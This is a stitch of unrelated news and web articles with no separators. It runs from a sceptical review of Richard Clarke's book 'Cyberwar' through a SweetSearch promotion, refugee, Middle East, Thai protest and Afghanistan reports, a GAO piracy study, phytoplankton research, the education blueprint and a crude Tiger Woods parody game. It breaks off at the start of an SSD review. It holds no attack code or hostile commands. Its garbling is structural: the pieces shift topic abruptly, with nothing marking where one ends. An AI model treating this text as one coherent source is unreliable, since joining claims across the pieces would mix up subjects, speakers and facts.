Readers of Richard Clarke 's new book Cyberwar who want to jump to the steamy parts should start at page 64 in the chapter " Cyber Warriors . "
It 's there you 'll find the Book of Revelation re-written for the internet age , with the end - times heralded by the Four Trojan Horses of the Apocalypse .
Chinese hackers take down the Pentagon 's classified and unclassified networks , trigger explosions at oil refineries , release chlorine gas from chemical plants , disable air traffic control , cause trains to crash into each other , delete all data – including offsite backups – held by the federal reserve and major banks , then plunge the country into darkness by taking down the power grid from coast - to - coast .
Thousands die immediately .
Cities run out of food , ATMs shut down , looters take to the streets .
That electronic Judgment Day is not the stuff of bad movies or sci - fi novels , according to Clarke , who writes , " A sophisticated cyber war attack by one of several nation - states could do that today , in fifteen minutes . "
That 's right .
In less time than it takes to download Live Free or Die Hard , foreign hackers could make it real .
A former top counter - terrorism advisor under President Clinton , who later served as President Bush 's cybersecurity czar , Richard Clarke has been sounding the alarm on cyberwar for more than a decade , rarely letting up , even through two real wars and one massive domestic terrorist attack .
Now Chairman of Good Harbor Consulting , Clarke is going full - out Jerry Bruckheimer in an effort to get America to take seriously what he clearly sees as a ( perennially ) looming existential threat to the nation .
And it turns out that in Cyberwar , like in real war , truth is the first casualty .
It 's not just Clarke 's 15 - minutes - to - doomsday scenario that stretches credulity .
Like most cyberwar pundits , Clarke puts a shine on his fear mongering by regurgitating long - ago debunked hacker horror stories .
In his world , the Blaster worm was partially responsible for the Northeast blackout of 2003 – the Energy Department concluded otherwise .
A power outage in Brazil is similarly attributed to a hacker , when the real - life evidence points to sooty insulators .
Clarke describes the Russian denial - of - service attacks against Estonian servers in 2007 as the " largest ever seen " ( not even close ) .
He claims that foreign hackers stole the plans to the F - 35 Joint Strike Fighter fighter , when they actually nabbed unclassified information on the plane 's self - diagnostic system .
So much of Clarke 's evidence is either easily debunked with a Google search , or so defies common sense , that you 'd think reviewers of the book would dismiss it outright .
Instead , they seem content to quote the book liberally and accept his premise that cyberwar could flatten the United States , and no one in power cares at all .
Of course , the debunking would be easier if the book had footnotes or endnotes , but neither are included – Revelation does n't need sources .
Clarke returns over and over to the security of the power grid , focusing on the systems known as SCADA that allow utilities to remotely monitor and control electric generation and transmission equipment .
Here , he starts reasonably enough : Good security practices dictate that these systems should be unreachable from the public net , and , unfortunately , that 's not always the case .
But from there , he quickly moves back to fantasy .
He suggests darkly throughout the book that the nation 's power and chemical plants are all shot through with secret backdoors implanted by the Russian , North Korean and Chinese governments , even though there 's never been a single publicly documented case , outside of a vague and anonymously sourced article in the Wall Street Journal
Clarke 's prescriptions are manyfold .
First , the nation 's backbone carriers – the ones with fiber optic networks crisscrossing the country – should be required to inspect all packets , and delete the ones that match known signatures of viruses and other malware .
While that might seem like a fine idea , the security industry is already moving away from signature - based strategies , since malware - makers have taken to testing their payloads against anti-virus software before deploying it .
ISPs already have the ability , and the legal right , to filter out known bad packets , but requiring it – as Clarke would do – would not only be ineffective , but it would inevitably lead to other demands to filter content , first child pornography , then perceived copyright violations , and finally unwanted speech of all sorts .
Clarke fails to consider the contents of the Pandora 's box he seeks to open .
More persuasively , Clarke argues the feds need to set some real , auditable and binding rules for companies that run critical infrastructure , such as the electrical grid .
The current policy is driven by the rationale that private - sector companies have enough financial incentive to protect their network , and the government 's role should be limited to helping share information about threats among the stakeholders .
That policy works well when it comes to companies like Google and Chase , which could lose customers if their networks are routinely hacked , but is n't as effective for your energy company , which likely has no real competition .
So , even if you do n't accept Clarke 's doomsday predictions , there 's a good case to be made that the feds ought to have strong rules governing these systems , and , as he suggests , a crew of white hat hackers tasked with trying to bust into the grid on a daily basis .
And there 's something to be gained by thinking about the consequences and morality of militaries infiltrating other country 's power grids , or whether the government ought to be able to take down Al Qaeda websites , or whether the military should ever hack into the financial system .
These are fun and not unimportant debates to have .
But the Chinese can't blunt the power of 15 carrier groups with some fancypants , unheard of ninja cybercoding tricks .
Live Free or Die Hard was a bad movie , not a prescient one ( it 's one of many Hollywood references Clarke makes to bolster his case ) .
The Chinese and Russians do n't have secret backdoors into the transformer outside your house , and if it blows up , it 's more likely a rodent chewing through the casing than a cyberwarrior sitting in an internet cafe in Shanghai .
The cyberwar rhetoric is dangerous .
Its practitioners are artists of exaggeration , who seem to think spinning tall tales is the only way to make bureaucracies move in the right direction .
But yelling " Cyberwar " in a crowded internet is not without consequence .
Not only does it promote unnecessary fear , it feeds the forces of parochial nationalism and militarism – undermining a communications system that has arguably done more to connect the world 's citizens than the last 50 years of diplomacy .
And , let 's be honest , your photocopier will never , ever catch on fire due to a hacker , like it does in Cyberwar .
Except , of course , in the movie version of this book , which undoubtedly , will star Bruce Willis or Keifer Sutherland .
See Also :
SweetSearch is the product of 100,000 + hours of research that went into creating finding Dulcinea 's 700 + Web Guides and thousands of articles .
This content links to tens of thousands of Web sites that have been evaluated as credible by our research experts and librarian and teacher consultants ( for a bevy of reviews of finding Dulcinea and SweetSearch from top educators , see our media kit ; to add SweetSearch to the search options on your Web browsers , click on the " Add On " box on SweetSearch ; or get a widget for SweetSearch , to embed it on your school Web site . ) .
For younger learners , we 've recently introduced a beta version of SweetSearch4Me , which is the only search engine that prominently ranks high quality Websites created for elementary school students , and mixes them with accessible primary source sites .
Please send feedback on SweetSearch4Me to sweetsearch@dulcineamedia.com so we can fully launch it with your input in September .
We search for more sites to include in SweetSearch by trolling through recommendations of librarians and teachers on their blogs and social bookmarking sites .
You know those great lists you 've been bookmarking for years ?
Well , SweetSearch is a giant , searchable repository of them .
We constantly evaluate our search results and " fine - tune " them , by increasing the ranking of Web sites from organizations such as the Library of Congress , the Smithsonian , PBS and universities .
We do more than merely exclude spam sites ; we also exclude marginal sites that read well and authoritatively , but lack academic or journalistic rigor , and thus are not cite worthy .
As technology journalist Paul Gilster wrote in his column in The News Observer , " Search here and you 're working in a universe of checked , verifiable sources and solid information ..... Google or Bing may find many of the same sites , but what I 've noticed is that some of the better sites for a particular topic wind up deep in their search results , often outranked by Web pages more commonly used but of inferior quality ... I was impressed with SweetSearch 's focus on credible scholarship and emphasis on primary source materials . "
Many articles that may be 3 , 5 , or 10 years old - but are still the most authoritative writing on the subject - are treated as stale by other search engines , and yet appear on the first page of SweetSearch results .
And to most students , the first page is the only one that exists .
The result ?
Students find what they need , and they find it faster .
When my generation was in school , the librarian pointed us to pre-screened resources on our general subject , and we decided which ones were the most relevant to our specific research project .
That ’s what SweetSearch does for students with online resources .
To enable students to better scan results to determine relevancy , we 've partnered with Yolink .
From a SweetSearch results page , click on the Yolink toolbar on the left side , and add a term to narrow your search .
Yolink will then browse your original search results and show an expanded view of the results in which your additional term appears .
Yolink then enables you to save excerpts of search results , with the source link , to a Google doc , Web - based email , or social bookmarking and sharing services such as Diigo , and to the citation generator Easy Bib .
Together , SweetSearch , Yolink and EasyBib are utterly transforming Web search for students , from something they can barely use to something they can use quite effectively .
Of course , students still need to follow the principles laid out in our Ten Steps to Better Web Research by , among other things , formulating good search queries , and often looking past the first few results to find the very best ones .
Another principle is to use more than one search engine , so SweetSearch includes a toggle option to view the search results from Google .
But enough of the " press release . "
Let 's take SweetSearch for a test - drive .
We 'll compare the results for " War of 1812 " on SweetSearch , Google and Bing .
Many of the results returned by Google and Bing are n't quite up to snuff for including in a school paper .
Wikipedia ranks first on both engines .
While many people find Wikipedia a good place to begin their research , most educators are frustrated that students use it almost exclusively , and not wisely .
For this reason , Wikipedia almost never shows up in SweetSearch results .
For " War of 1812 , " the second result on Google is " Gateway New Orleans , " which includes a brief summary of the war by an unknown author .
The purpose of the site is to promote tourism in New Orleans , not to promote scholarship on the War of 1812 .
And both search engines prominently display a link that contains a teaser summary of the war by Gala Films , whose purpose is to get you to buy a movie .
Both of these sites rank so high because general commercial search engines display recently published content high in its results , since many times that is what the user finds most relevant .
But when it comes to a war that ended nearly two centuries ago , recently produced material has little advantage over the “ classics . ”
Both search engines also prominently feature " Warof1812.ca , " and " Warof1812.net , " likely because of the specificity of their domain names .
The first offers a lot of material written by two people , whose credentials are not provided .
The site contains no " About Us " section , and its primary purpose is to sell products relating to the war .
The second is the result of a long - abandoned project to put student material on the Internet ; it 's primary purpose now seems to be to drive you to search the topic yourself on Google .
On the first page of SweetSearch 's results , you 'll find precisely the Web sites that a teacher wants students using .
The first result is the Library of Congress ' entire collection of primary source documents on the War of 1812 .
The second is a comprehensive ThinkQuest created by students under the supervision of teachers and professors , followed by sites from the National Archives and the U.S. Military .
Four sites in the next group — an Indiana University site about the political cartoons of the War of 1812 , a Long Island University site about African - American Freedom Fighters , a Smithsonian site about the Star Spangled Banner , and the Avalon Project of Yale University — are sites that students could use to solidly distinguish their work from that of their classmates .
Where are these results on Google and Bing ?
Scattered through the third to seventh results pages .
Now let 's do a comparison for " Shakespeare " in SweetSearch , Google and Bing .
Again , Wikipedia ranks first for Google and Bing .
Also appearing prominently , again due to the specific domain names , are " Shakespeare.com " and " Shakespeare-online.com . "
Each of these is a well - written " passion site , " one created by an individual who is passionate about the subject , but does not possess academic credentials that would enable a student to rely on the sites when writing an academic paper .
Each engine also contains several sites that are only about selling products .
On SweetSearch , you again find some outstanding academic resources , many of which are buried in Google or Bing .
These include sites from the Library of Congress , the British Library , PBS and Project Gutenberg .
We 'd love to get your feedback on SweetSearch .
Try your own searches and let us know what you think by commenting below or by e-mailing sweetsearch@dulcineamedia.com .
Mark Moran
Founder and CEO
Most of the Burundians were no longer in refugee camps
The UN has praised Tanzania for granting citizenship to some 162,000 refugees who fled Burundi 38 years ago .
" It 's the most generous naturalisation of refugees anywhere , " said UN refugee agency spokeswoman Melissa Fleming .
UNHCR head Antonio Guterres described it as a " historic moment " and urged other countries with long - term refugees to follow Tanzania 's example .
Until 2000 , Tanzania had one of Africa 's largest refugee populations , 680,000 , from Burundi and DR Congo .
Some 350,000 Burundians have returned home in recent years , says the UNHCR .
A UN spokeswoman said most of those granted Tanzanian nationality were Hutus .
They had mostly fled conflict with the Tutsi - dominated army .
The spokeswoman said they were already integrated into Tanzanian society and were not living in refugee camps , reports the Reuters news agency .
The US envoy to the Middle East , George Mitchell , will hold talks tomorrow with Binyamin Netanyahu , despite the Israeli prime minister 's formal rejection of White House demands for a freeze on Jewish settlements in East Jerusalem .
Both the US and the Palestinians are calling for a halt on construction as a precondition for a resumption of peace talks with Israel .
But according to Israeli officials , Netanyahu wrote to Barack Obama at the weekend rejecting the demand .
Today Netanyahu told Israel 's Channel 2 : " I am saying one thing .
There will be no freeze in Jerusalem .
There should be no preconditions to talks . "
Relations between Israel and the US sank to a new low last month after a tense meeting in Washington in which Obama gave Netanyahu an ultimatum to respond to US calls for a freeze .
After a lengthy delay that will have further irritated the White House , Netanyahu responded at the weekend , aides told Associated Press and the Wall Street Journal .
Tension between the US and Israel resulted in Mitchell putting on hold for a month his shuttle diplomacy between the Israelis and Palestinians .
He arrived in Israel today and is due to resume diplomatic efforts tomorrow , combining his talks with Netanyahu with a trip to Ramallah to see the Palestinian president , Mahmoud Abbas .
Saeb Erekat , the chief Palestinian negotiator , said he hoped Mitchell would bring the right formula to allow indirect talks to start .
Although Netanyahu ruled out a halt on settlement - building , he was reported to have offered other proposals as concessions to the Palestinians .
There was media speculation in Israel that Netanyahu may have publicly ruled out a freeze but will privately impose one .
Earlier this week General James Jones , Obama 's national security adviser , expressed disappointment that direct negotiations between the Israelis and Palestinians had not yet begun .
He said it was " time to begin those negotiations and to put an end to excuses " .
Obama 's Middle East adviser , Dan Shapiro , is also in Israel , another sign that , in spite of the reported rejection by Netanyahu , negotiations are continuing behind the scenes .
Mark Regev , a spokesman for Netanyahu , would not discuss the details of Israel 's talks with the US administration but he said : " We want this process to succeed and to see the restart of talks .
We hope that this is possible soon . "
There have not been direct peace negotiations between the two sides since before Israel 's war in Gaza early last year .
Israel claims sovereignty over East Jerusalem , which it captured in the 1967 war and later annexed , and Netanyahu has insisted construction must continue there .
Internationally , East Jerusalem is regarded as under Israeli military occupation and settlement on occupied land is illegal under international law .
" It is just impossible and unacceptable that people try to impress us that we should limit construction in Jerusalem , " said Benny Begin , a senior cabinet minister .
The US administration spent much of last year trying to convince Netanyahu to halt all settlement construction .
Netanyahu refused and agreed only to a 10 - month partial halt to construction in the West Bank – a moratorium which expires this autumn .
Mitchell then spent many months trying to prepare indirect negotiations between Israel and the Palestinians , but a day after an agreement on so - called " proximity talks " was announced , Israeli officials gave approval for 1,600 new homes in an East Jerusalem settlement during a visit by the US vice - president , Joe Biden .
Biden condemned the decision and the indirect talks collapsed before they had begun .
Israel has yet to restore its relations with the US and a refusal by Netanyahu to halt East Jerusalem settlement building would only prolong the confrontation .
However , the Wall Street Journal said Netanyahu would offer other incentives instead , including the release of Palestinian prisoners from Israeli jails , the lifting of some checkpoints in the occupied West Bank and allowing some more goods to enter Gaza , despite the long Israeli economic blockade .
Several US officials have emphasised the importance for the US of progress in Israeli - Palestinian peace negotiations .
Jones indicated this week that progress in the Middle East would help Washington curb Iranian nuclear ambitions .
" Advancing this peace would … help prevent Iran from cynically shifting attention away from its failures to meet its obligations , " he said .
Israel has long argued that confronting Iran ought to be an international priority .
But Avigdor Lieberman , the Israeli foreign minister , this week resisted any suggestion that a peace agreement should be imposed on Israel and the Palestinians .
" Any attempt to force a solution on the parties without establishing the foundation of mutual trust will only deepen the conflict , " Lieberman told diplomats in Jerusalem .
Envoy 's troubles
A high point in the lives of Tony Blair and former US senator George Mitchell was their successful negotiation , against the odds , of the Northern Ireland peace process in 1997 .
The two have worked together again for more than a year , trying to resolve the Israeli - Palestinian conflict , Mitchell as Barack Obama 's special envoy to the Middle East and Blair as the representative of the Quartet , comprising the US , UN , EU and Russia .
Both are finding the Middle East harder to crack – so hard that for months there have been rumours on the diplomatic circuit that they have each considered quitting .
However , Mitchell returned to the Middle East today for talks scheduled for to try tomorrow with Israeli and Palestinian leaders , trying to find a compromise that will open the way for peace talks .
Mitchell was appointed within days of Obama becoming president , a sign that the new administration saw the conflict as a priority .
But it has proved slower and more frustrating than the administration had anticipated , with an Obama plan falling apart in September and talks deadlocked since then .
Mitchell 's success in Northern Ireland , the result of patiently listening to both sides and winning their trust , does not guarantee him respect these days in Washington or the Middle East .
He has already been criticised publicly by Israelis and Palestinians as a flop .
And he has been criticised too in DC , against a background of infighting between advisers from the White House and state department over the way forward , one of the reasons that fuelled rumours he might quit .
Mitchell faced criticism in the early days in Northern Ireland too , particularly from the Unionists , but painstakingly kept on going , just as he is doing in the Middle East .
On the Charlie Rose programme in January , he recounted a story about a lecture he delivered in Israel a year before his appointment , telling of his involvement in Northern Ireland .
Asked afterwards by a member of the audience about the length of the Northern Ireland conflict , Mitchell confirmed it had been 800 years .
His questioner replied : " No wonder you settled , it 's such a recent argument . "
Mitchell went on to say on the programme that it would be naive for anyone to expect an early resolution .
The face of EA Sports Tiger Woods PGA
Tour series is now the unwilling subject of another video game , the adults - only , sexually explicit screw 'em up Tiger Woods Affair Tour 2010 .
D - Dub Software , makers of the free - roaming sexual , drug - charged Bonetown , have struck while the iron is room temperature , turning Woods ' extramarital dalliances into a video game .
Well , to call it a video game might be overly generous , as Tiger Woods Affair Tour 2010 appears to be little more than playable publicity for Bonetown , starring an oversexed red shirted avatar that bears only the loosest resemblance to Woods .
Advertisement
According to the game 's host , the PC game lets you " Play as Tiger Woods and bang pornstars and cocktail waitresses , or just take out some aggression with a golf club on security guards ! "
Unfortunately , the most illustrative screen shots of Tiger giving and receiving are not Kotaku front page appropriate .
Like the gameplay of Bonetown , Tiger Woods Affair Tour 2010 appears to involve taking all manner of illicit substances , boning cartoonish avatars and occasionally wielding a golf club with which to whack The Man .
Polygonal penetration and nudity , perfect for the easily excited , abounds .
Advertisement
Tiger Woods Affair
Tour 2010 is available as a free download from sponsors Ebaum Nation , should you be willing to take the risk to download the thing .
Have I mentioned that it 's incredibly not safe for work ?
Tiger Woods ' Sex Scandal : The Video Game [ AOL - thanks , Victoria ! ]
A major setback for those that claim piracy is having an adverse affect on the US economy : the US Government Accountability Office , who was tasked with reviewing the efforts to find out what , if any , impact piracy has on the US economy , has concluded that all of these studies – all of them – are bogus .
Better yet – the GAO even goes as far as to say that piracy may have a positive effect on the economy .
Over the course of the years , we ’ve been subjected to numerous doom and gloom studies from organisations like the MPAA , RIAA , and BSA , which contained figures supposedly coming from government sources .
These reports would get widespread coverage in the media and would influence government policy regarding IP enforcement to a rather great degree .
Consequently , US Congress decided back in April 2009 to task the Government Accountability Office with investigating these reports to assess their validity .
Released Monday , the report tears all of these reports to shreds , and I ’m not overstating things here ; the validity of each and every one of these reports is highly questionable , according to the GAO .
Of the three most often - cited studies , the GAO states that they “ cannot be substantiated due to the absence of underlying studies .
Each method ( of measuring ) has limitations , and most experts observed that it is difficult , if not impossible , to quantify the economy - wide impacts . ”
They state that the oft - made assumption that each pirated product constitutes a lost sale is just an “ assumption ” .
Some figures used in the reports were attributed to the FBI , to which the FBI replied they have no records of said figures .
Loosely translated : big content made them up .
Furthermore , the GAO even concludes that piracy may have a positive effect on the economy , for instance because it leaves consumers with more money to spend elsewhere .
On top of that – and I personally believe this is a far more important aspect that gets deliberately neglected by the content industry – people may use illegal downloading to sample content .
In other words , without such sampling , they would be buying less media , not more .
“ Some experts we interviewed and literature we reviewed identified potential positive economic effects of counterfeiting and piracy .
Some consumers may knowingly purchase a counterfeit or pirated product because it is less expensive than the genuine good or because the genuine good is unavailable , and they may experience positive effects from such purchases , ” the GAO concludes , “ Consumers may use pirated goods to ‘ sample ’ music , movies , software , or electronic games before purchasing legitimate copies .
[ This ] may lead to increased sales of legitimate goods . ”
Still , this does n’t mean piracy is not a problem – the GAO report calls it “ sizeable ” – it just means we have n’t been able yet to really gauge its impact , contrary to what big content wants you ( and your government ) to believe .
This report will most likely quickly disappear out of view due to President Obama ’s close ties to big content and his support for ACTA .
It seems that this is a battle the EU parliament will have to fight for the world , since individual member states in the EU certainly wo n’t be doing anything ( Hi France ! Hi UK ! ) , and I have little hope for Obama to step away from all that juicy MPAA / RIAA campaign money .
Phytoplankton are single - celled organisms that serve as the base of the marine food web and provide half the oxygen we breathe on Earth .
They also play a key role in global climate change by removing carbon from the atmosphere and injecting it deep into the oceans .
Scientists study phytoplankton to understand how the tiny plants help transport elements like carbon through the environment .
Although they understand much of what phytoplankton do , less is understood about why particular plankton live in particular environments and what maintains the diversity of phytoplankton .
Previous research has suggested that more diverse ecosystems may be more efficient at utilizing resources , meaning that the diversity of phytoplankton could be important for regulating the cycles of carbon and other elements in the ocean .
But scientists need a better understanding of that diversity before they can understand how much carbon the ocean ultimately removes from the atmosphere .
Researchers from MIT ’s cross-disciplinary Darwin Project , a collaboration between the Earth System Initiative ( ESI ) and the Computational and Systems Biology Initiative ( CSBi ) and funded by the Gordon and Betty Moore Foundation ’s Marine Microbiology Initiative and NASA , have developed a computer model to simulate ecosystems in a virtual ocean , a model that could guide future field surveys of phytoplankton .
They suggest that the diversity of phytoplankton species at a given location depends on the balance between the removal of species through competition for limited nutrient resources and their replacement by ocean currents , according to a paper published online Feb. 25 in Science Express .
In order to grow , phytoplankton need sunlight and nutrients like carbon , some of which comes from the carbon dioxide in the atmosphere .
When phytoplankton die , some of their cells sink to the ocean floor , taking carbon away from the atmosphere and injecting it deep into the ocean through a process known as the “ biological pump . ”
To understand the global scale of this process , scientists must learn more about the diversity of phytoplankton species .
“ We feel this paper is a step toward understanding what the phytoplankton diversity is at different places in the ocean and what regulates that diversity , ” said lead author Andrew D. Barton , a graduate student in the Department of Earth , Atmospheric and Planetary Sciences ( EAPS ) .
Although future studies will have to make a more explicit link between phytoplankton diversity and the climate , Barton hopes that his group ’s models could be used as a tool to inform future sampling surveys that try to map phytoplankton diversity in the ocean .
Building an ecosystem
Barton and his colleagues used a computer model developed in 2007 by co-author Mick Follows , a senior research scientist in EAPS , to study the distribution of particular phytoplankton types , as well as to observe how phytoplankton help move different elements through the oceans .
To study these cycles , Barton ’s team plugged information about the traits of nearly 80 phytoplankton species , such as how fast they grow and what temperature they prefer to live in , into the computer model , which also simulates the physical circulation and currents of the ocean .
After the computer progressed the virtual ocean forward for a decade , certain patterns began to appear , with more species appearing in the warm tropics and Gulf Stream regions than at colder , higher latitudes .
Barton ’s team then hypothesized why those patterns occur , taking into account the circulation of the ocean in different regions , as well as the fact that growth rates depend on changes in temperature , light and nutrient concentration .
They conclude that the amount of species in a given location is based on how rapidly species are removed because of competition for limited resources , and the rate at which species are returned to that location by the ocean ’s currents — a balance that is also affected by the nature of the environment .
In the tropics , seasonal variations are weak , and different species can coexist for long periods .
But there is less diversity at higher latitudes , where the changing seasons vary the amount of light and nutrients that phytoplankton can consume throughout the year .
Here , a few highly specialized phytoplankton rapidly outcompete all others during the strong spring blooms , and this effect outweighs the rate at which the ocean ’s currents can return species to these latitudes .
Barton and his colleagues also explain that a relatively large variety of phytoplankton coexist in the Gulf Stream and similar currents that constantly move and mix different species from different regions .
In this case , the variability of the environment does n’t matter , because the intensity of the currents prevents more dominant species from outcompeting other species for food .
Future mapping
Princeton ecologist Simon Levin called the research “ highly original and exciting ” for scaling microscopic details of the ocean to macroscopic patterns by combining fluid dynamics , ecology and evolutionary biology data into one model .
He also thinks the research will be useful for planning future studies where phytoplankton are collected .
Barton and his colleagues hope their interpretation will help inform future mapping surveys of the ocean by guiding oceanographers where to look for particular patterns in phytoplankton diversity .
They need new field data to test and refine their hypotheses and are currently speaking to scientists at Woods Hole , MIT and the University of Hawaii about collecting data on upcoming long - distance scientific explorations in the Pacific Ocean .
Barton ’s next step is to evaluate the diversity patterns using a very high resolution version of the current computer model to examine how the ocean ’s complex range of structures — small eddies , currents and fronts — provide small habitats that could enhance diversity .
Future research should also examine how the processes of extinction and evolution help maintain the diversity patterns , he said .
The Obama administration has sent Congress a “ blueprint ” for a new public education bill to replace the expiring 2002 No Child Left Behind law .
It discards some of NCLB ’s much - criticized features , while retaining or adding others that teachers , their unions and other public school advocates oppose .
It projects federal support for educational equity , improving teaching and learning and making every student “ college - ready . ”
The devil , many say , is in the details .
Congressional hearings on the proposals opened yesterday with testimony by Education Secretary Arne Duncan .
Leaders of the nation ’s two teachers unions will also testify .
The 41 - page blueprint emphasizes eliminating disparities between schools in poorer and wealthier communities , and within schools .
Moving away from the NCLB focus on reading and math to the exclusion of other subjects , it calls for a “ more complete ” curriculum including science , history , the arts and other subjects .
Addressing complaints that NCLB ’s standardized test focus has led states to “ dumb down ” their standards , the blueprint requires states to develop “ college - and career - ready standards ” for English language arts and math , with additional funding possible for groups of states to develop assessments in areas like science , history and foreign languages , and for English learners and students with disabilities .
Testing and other forms of assessment , Duncan insisted in a conference call with reporters on Monday , will focus “ not just on absolute test scores but on growth and gain , ” measuring improvement over a period of time .
The blueprint discards NCLB ’s widely criticized “ adequate yearly progress ” test - score standard , which led to labeling a third of the nation ’s 98,000 schools as “ failing . ”
It talks of a new program to “ support ambitious efforts to recruit , place , reward , retain , and promote effective teachers and principals and enhance the profession of teaching . ”
It requires states , “ in collaboration with teachers , principals , and other stakeholders , ” to develop evaluation systems that identify “ effective ” and “ highly effective ” teachers and principals “ based in significant part on student growth ” along with other measures such as classroom observation .
Speaking of “ fostering a race to the top , ” it uses what Duncan called a “ carrots and sticks ” approach that offers “ rewards ” for achieving “ dramatic gains ” in student achievement , and requires controversial “ turnaround models ” for lowest - performing schools .
Three of the four “ turnaround ” models require closing the schools or mass firing the teachers and principal as happened recently in Central Falls , R.I .
One of these involves turning the schools over to charter or other private operators .
Many public school reform advocates are up in arms over the green - lighting of privatization and mass teacher firings .
In New York , the parent - community Alliance for Quality Education notes in its March newsletter that “ there is little evidence that such practices work ” and “ charters do not have a track record of turning around low performing schools and have no transparency . ”
The organization describes itself as “ one of the lone and loudest voices for a long time advocating that the lowest performing schools need dramatic action to become successful , ” but says remedies must be based on “ proven educational strategies . ”
American Federation of Teachers President Randi Weingarten , in a March 13 statement , said an initial review of the blueprint suggested that it “ places 100 percent of the responsibility on teachers and gives them zero percent authority . “
Dennis Van Roekel , president of the National Education Association , said , “ We were expecting to see a much broader effort to truly transform public education for kids .
Instead , this blueprint ’s accountability system still relies on standardized tests to identify winners and losers .
We were expecting more funding stability to enable states to meet higher expectations .
Instead , this blueprint requires states to compete for critical resources , setting up another winners - and - losers scenario .
We were expecting school turnaround efforts to be research - based and fully collaborative .
Instead , we see too much top - down scapegoating of teachers and not enough collaboration . ”
Seeking to counter that criticism , Education Secretary Arne Duncan told reporters Monday that unlike past practices , “ there will be shared responsibility .
Not just with teachers , but principals , school systems , and even states .
Everyone ’s going to be accountable for driving better results . ”
In a CBS interview Monday , Van Roekel said , “ We want to make sure the policy matches the rhetoric . ”
Although the blueprint speaks of measuring student “ growth , ” he warned , it still appears to rely on high - stakes testing .
Reiterating his criticism of the winners and losers approach , Van Roekel raised concern that the blueprint is “ moving more and more funds ” away from formulas that provide equitable federal funding across states .
“ We need to make sure all schools get adequate funds , not just a few winners , ” he said .
He expressed “ total support ” for Obama ’s and Duncan ’s reform intentions , saying they are “ absolutely motivated by the right thing , ” and the union ’s access to education officials has been “ wonderful . ”
But he emphasized that involving teachers in reform is “ absolutely essential . ”
A longtime activist with New York ’s United Federation of Teachers said it is urgent for progressive teacher unionists and supporters to come forward with dialogue and solutions to the complex problems facing schools .
Otherwise , he said , “ blame the parents ” or “ blame the teachers ” frames the debate , and public schools and unions will be the losers .
The administration ’s education blueprint and transcript of Duncan ’s Monday conference call can be found here .
Photo : http://www.flickr.com/photos/wwworks/
/ CC BY 2.0
Please turn on JavaScript .
Media requires JavaScript to play .
Advertisement
Thai protesters have hurled plastic bags filled with gallons of blood in a symbolic protest at the prime minister 's house in Bangkok .
Security forces agreed to let a few of the red- shirted demonstrators splatter the blood outside the compound of Prime Minister Abhisit Vejajjiva .
They went on to picket the US embassy , accusing US intelligence of bugging deposed ex-PM Thaksin Shinawatra .
The opposition , many of whom back Mr Thaksin , want fresh polls .
The blood of the common people is mixing together to fight for democracy
Natthawut Saikua
Red - shirt leader
In pictures : Bloody protests Profile : Thailand 's reds and yellows Thaksin given Montenegro passport Red - shirt leaders and government figures have insisted they are determined to keep the protests , the largest in recent years , peaceful .
The demonstrators say Mr Abhisit 's government is illegitimate and should be dissolved .
Neither Mr Abhisit nor his family were at their home in the upmarket Bangkok suburb .
He has been staying at the headquarters of the 11th Infantry Battalion in the north of Bangkok since the protests began .
Clean up Police and troop reinforcements were drafted in at the last minute to the prime minister 's house , sparking fears of a confrontation .
The government had said it would ban the protest , but once again a negotiated solution was found .
Several dozen demonstrators were allowed through the police cordon carrying plastic bottles filled with blood , which was poured into small plastic bags and then thrown at the home .
Government cleaners quickly went into action to mop up the blood on Tuesday .
There was criticism that the protest wasted a resource which could have been used to help the sick .
Several thousand of the demonstrators later gathered outside the American embassy in the Thai capital .
Some said they were there to tell the international community that their government was illegitimate .
But others said the US had accused Mr Thaksin of inciting violence after snooping on the billionaire former leader 's phone calls .
Donors queue The BBC's South East Asia correspondent Rachel Harvey says the protesters ' numbers are dwindling , but the passion is undiminished and the demands as loud as ever .
A senior police officer said he estimated numbers had dropped from 100,000 to 90,000 people by Tuesday evening .
Reporters asked a protest leader , Veera Musikapong , what their next move would be , and he replied : " I want to know that myself , " the Associated Press reported .
He said the group mapped strategy on a day - by - day basis .
PROTEST TIMELINE 2006 : Yellow - shirts launch street protests to oust PM Thaksin Shinawatra Sept 2006 : Thaksin ousted in military coup Dec 2007 : Thaksin allies win first post - coup elections Sept 2008 : Yellow - shirts occupy Bangkok government buildings , clash with pro-Thaksin red-shirts Nov 2008 : Yellow - shirts occupy Bangkok 's airports , forcing cancellation of hundreds of flights Dec 2008 : Thaksin - allied government falls , rival Abhisit Vejjajiva forms government Apr 2009 : Red-shirts storm Asean summit , clashes erupt in Bangkok Mar 2010 : Red -shirts launch protest aimed at bringing government down
Q&A : Thailand protests
Thaksin ruling wo n't heal divide On Tuesday , they poured human blood at the gates of Government House and , later , the headquarters of the Democrat Party .
Many thousands of protesters had lined up to donate their blood .
" The blood of the common people is mixing together to fight for democracy , " said Natthawut Saikua , a red - shirt leader .
Tens of thousands of security forces remain on standby and army leaders say they plan to be flexible and gentle as the protests continue .
On Monday , Mr Abhisit rejected a demand from protesters to quit and call elections .
The stand - off is the latest in a deep political schism in the country , linked to the 2006 military coup which deposed former leader Thaksin Shinawatra .
A cabinet meeting scheduled for Tuesday was cancelled , and a parliamentary hearing stopped for lack of a quorum .
Both sides appeared to be making every effort to avoid confrontation .
The protesters say the present government was installed illegally after Mr Thaksin was ousted in a military coup in 2006 , and two subsequent allied governments were deposed by court action .
Bookmark with : Delicious
Digg
reddit
Facebook
StumbleUpon
What are these ?
E-mail this to a friend Printable version
The sounds of Metallica and Thin Lizzy are now being used on the frontline in Afghanistan , according to a report by the AFP .
Marines are allegedly blasting heavy metal into villages in Marjah , hoping to subdue the Taliban through ringing ears .
" Taliban hate [ this ] music , " said a US special forces sergeant .
" Some locals complain but it 's a way to push them to choose [ sides ] .
It 's motivating marines as well . "
Apparently , when rebel forces start firing on American soldiers in Marjah , an armoured vehicle with " powerful speakers " fires up the tunes , blaring rock and heavy metal so loudly that it can be heard two kilometres away .
The tactical playlist continues for several hours .
As the military blasts Offspring 's Pretty Fly for a White Guy , children cover their ears and , it is claimed , insurgents lay down their arms .
Mixed in with the songs are messages from the Afghan government and threats to the Taliban resistance .
There are no obscenities , the AFP 's contact promises , " but we tell them they 're gonna die " .
Soldiers may not be DJing in Marjah for much longer .
" It 's inappropriate , " said lieutenant colonel Brian Christmas , the commander of marines in northern Marjah .
Christmas claimed he had not heard of ( or heard ) the audio attacks .
" I 'm going to ask this to stop right now . "
Update : Random write performance of the drive we reviewed may change with future firmware updates .
Click here to find out more .
Corsair ’s late entry into the SSD market meant that it missed the JMicron mess of the early days , but it also meant that Corsair missed the bulk of the early Indilinx boat .
